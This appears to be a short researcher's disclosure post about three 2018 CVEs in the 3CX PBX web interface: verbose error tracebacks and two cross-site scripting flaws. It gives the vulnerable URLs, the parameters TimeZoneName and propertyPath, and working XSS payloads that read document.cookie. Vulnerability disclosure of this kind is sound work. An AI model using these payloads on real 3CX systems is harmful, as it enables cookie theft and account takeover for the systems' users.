🔎Security Issues on 3cx Web Service

some CVEs found by me and my bros 2018 when i was a Jr

Me and my coworkers, Ricardo Fajin, Daniel Chactoura, Lucas Carmo, Kelvin Clark, Found some issues on the famous pabx 3cx .

The issues Found:

Multiple Improper error Handling
Cross Site Scripting Reflected
Cross Site Scripting on Stack trace

1) Multiple Improper error Handling

Researching the application we found several traceback errors. As an explample the error below. this could be especially dangerous because it gives, several informations about the server itself.

2) Reflected Cross Site Script

URL: https://<IP>:<Port>/api/CallLog?TimeZoneName=<script>alert(document.cookie)</script>&callState=All&dateRangeType=Today&fromFilter=&fromFilterType=Any&numberOfRows=200&searchFilter=&startRow=0&toFilter=&toFilterType=Any

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: TimeZoneName

3) Cross Site Script on Stack trace

URL: https://<ip>:5001/#/app/ivr_editor/4

Payload Used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: propertyPath

CVEs Related to this article:

CVE-2018–14905

CVE-2018–14906

CVE-2018–14907

PreviousSecurity Issues on Eramba NextSecurity Issues on Samsung Syncthru Web Service

Last updated 3 years ago

hashtagThe issues Found:

hashtag1) Multiple Improper error Handling

hashtag2) Reflected Cross Site Script

hashtag3) Cross Site Script on Stack trace

The issues Found:

1) Multiple Improper error Handling

2) Reflected Cross Site Script

3) Cross Site Script on Stack trace